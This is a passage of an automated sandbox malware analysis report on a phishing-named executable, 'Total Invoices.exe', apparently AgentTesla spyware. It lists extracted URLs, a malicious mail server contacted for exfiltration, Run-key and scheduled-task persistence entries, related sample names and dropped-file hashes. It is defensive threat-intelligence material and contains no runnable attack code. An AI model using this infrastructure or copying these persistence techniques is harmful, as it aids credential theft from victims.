                          http://www.fontbureau.com/designersGTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://account.dyn.com/Total Invoices.exe, 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dWXyZYb.exe, 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers?Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/DataSet1.xsdTotal Invoices.exe, dWXyZYb.exe.0.drfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://mail.unitechautomations.comRegSvcs.exe, 00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.tiro.comTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comlTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cTheTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmTotal Invoices.exe, 00000000.00000002.1735865381.0000000005B39000.00000004.00000020.00020000.00000000.sdmp, Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-user.htmlTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fonts.comTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTotal Invoices.exe, 00000000.00000002.1730336857.000000000335C000.00000004.00000800.00020000.00000000.sdmp, dWXyZYb.exe, 00000009.00000002.1825169792.0000000002FF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sakkal.comTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              192.185.129.60
                                              		mail.unitechautomations.comUnited States
                                              		46606UNIFIEDLAYER-AS-1UStrue

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1430700
                                              Start date and time:2024-04-24 03:16:07 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 31s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:22
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Total Invoices.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@23/19@1/1
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 129
                                              • Number of non-executed functions: 13
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target GUIVTme.exe, PID 7224 because it is empty
                                              • Execution Graph export aborted for target GUIVTme.exe, PID 7964 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              02:17:02Task SchedulerRun new task: dWXyZYb path: C:\Users\user\AppData\Roaming\dWXyZYb.exe
                                              02:17:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                              02:17:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                              03:16:56API Interceptor1x Sleep call for process: Total Invoices.exe modified
                                              03:17:02API Interceptor29x Sleep call for process: powershell.exe modified
                                              03:17:03API Interceptor37x Sleep call for process: RegSvcs.exe modified
                                              03:17:04API Interceptor1x Sleep call for process: dWXyZYb.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              192.185.129.60CAHKHCM2404009CFS.exeGet hashmaliciousAgentTeslaBrowse
                                                Booking_BK24-000288_19_Apr_2410_52_34 AM.exeGet hashmaliciousAgentTeslaBrowse
                                                  HBL.exeGet hashmaliciousAgentTeslaBrowse
                                                    DHL-102113XXX.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                      DHL-100122XXXXXX.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                        003035044445.AWB.PRG.CHO.M20.20231124.003622.20231124.004549.10532.exeGet hashmaliciousAgentTeslaBrowse
                                                          SOB_BK23-003618_25.exeGet hashmaliciousAgentTeslaBrowse
                                                            SOB_BK23-003618_25_Nov_23_1_39_30_PM.exeGet hashmaliciousAgentTeslaBrowse
                                                              ordref_bomyogeshd_20112023165922.exeGet hashmaliciousAgentTeslaBrowse
                                                                Outstanding_Invoices.exeGet hashmaliciousAgentTeslaBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  mail.unitechautomations.comCAHKHCM2404009CFS.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 192.185.129.60
                                                                  Booking_BK24-000288_19_Apr_2410_52_34 AM.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 192.185.129.60
                                                                  HBL.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 192.185.129.60
                                                                  003035044445.AWB.PRG.CHO.M20.20231124.003622.20231124.004549.10532.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 192.185.129.60
                                                                  SOB_BK23-003618_25.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 192.185.129.60
                                                                  SOB_BK23-003618_25_Nov_23_1_39_30_PM.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 192.185.129.60
                                                                  ordref_bomyogeshd_20112023165922.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 192.185.129.60
                                                                  Outstanding_Invoices.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 192.185.129.60
                                                                  ATTACHED_INVOICES.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 192.185.129.60
                                                                  SOA_SEP.OCT.NOV.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 192.185.129.60

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  UNIFIEDLAYER-AS-1USknfV5IVjEV.lnkGet hashmaliciousUnknownBrowse
                                                                  • 162.241.216.65
                                                                  http://www.noahsarkademy.comGet hashmaliciousUnknownBrowse
                                                                  • 69.49.230.31
                                                                  CR-FEDEX_TN-775720741041.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 192.185.13.234
                                                                  Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 162.144.15.164
                                                                  DHL_RF_20200712_BN_OTN 0095673441.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 192.185.13.234
                                                                  https://c8rzg8yq.r.us-east-1.awstrack.me/L0/https:%2F%2Fimaot.co.il%2FContentArea%2FBannerClick%3FBannerId=437%26BannerType=CookbookBanner%26ContentAreaId=74%26SiteUrl=mexperiencia.com%2Felvisa%2F451c858f52d4a1deb2b006143366fdc7%2F6VrgwA%2FcnRpdUB6ZW5kZXNrLmNvbQ==/1/0100018ef745f143-c3ec9f00-7fd4-48c1-9788-f0017cd20054-000000/By5Tv4iHSsE-ml_PGFCkji_Ea6g=370Get hashmaliciousUnknownBrowse
                                                                  • 162.241.225.201
                                                                  DHL INVOICE.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 192.185.171.184
                                                                  PO No. 2430800015.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 162.241.225.141
                                                                  DHL_RF_20200712_BN_N0095673441.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 192.185.13.234
                                                                  CR-FEDEX_TN-775537409198_Doc.vbsGet hashmaliciousUnknownBrowse
                                                                  • 192.185.84.89

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeBARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                                    BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                                      Urgent PO 18-3081 Confirmation.exeGet hashmaliciousAgentTeslaBrowse
                                                                        CAHKHCM2404009CFS.exeGet hashmaliciousAgentTeslaBrowse
                                                                          FAR.N_2430-240009934.exeGet hashmaliciousAgentTeslaBrowse
                                                                            TT copy of the first payment.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Booking_BK24-000288_19_Apr_2410_52_34 AM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                charesworh.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  FAR.N_2430-240009934.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    FAR.N#U00b02430-24000993.exeGet hashmaliciousAgentTeslaBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GUIVTme.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):142
                                                                                      Entropy (8bit):5.090621108356562
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                                      MD5:8C0458BB9EA02D50565175E38D577E35
                                                                                      SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                                      SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                                      SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Total Invoices.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Total Invoices.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.34331486778365
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dWXyZYb.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\dWXyZYb.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.34331486778365
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2232
                                                                                      Entropy (8bit):5.380285623575084
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:+WSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZUUyus:+LHxvCsIfA2KRHmOugms
                                                                                      MD5:09598582CEE9801F213404AB48FF6113
                                                                                      SHA1:0DFF1B5BA250A973855BF0AA442C2DE61AE7E7AF
                                                                                      SHA-256:C7D34FF91DD7D1DFDE5883D125E853A57DC4EF8F0C22254B58EE38F61DA322B4
                                                                                      SHA-512:FB4936B8483006CA442438D1A02D928CE48A3378693DA712BA17E416405DD39343CA1F78A3BD154A45CACF6EECC04EC449BD5C74245E82F14FB00E6EE72C24FE
                                                                                      Malicious:false
                                                                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_434gqpep.zzh.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ea0d5uw0.ipu.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0ocecrj.i51.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hli40zo1.4k1.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ls01ytkc.1h3.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nldzebqo.iky.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqtmfqkv.0xd.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmfttmtt.ux0.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

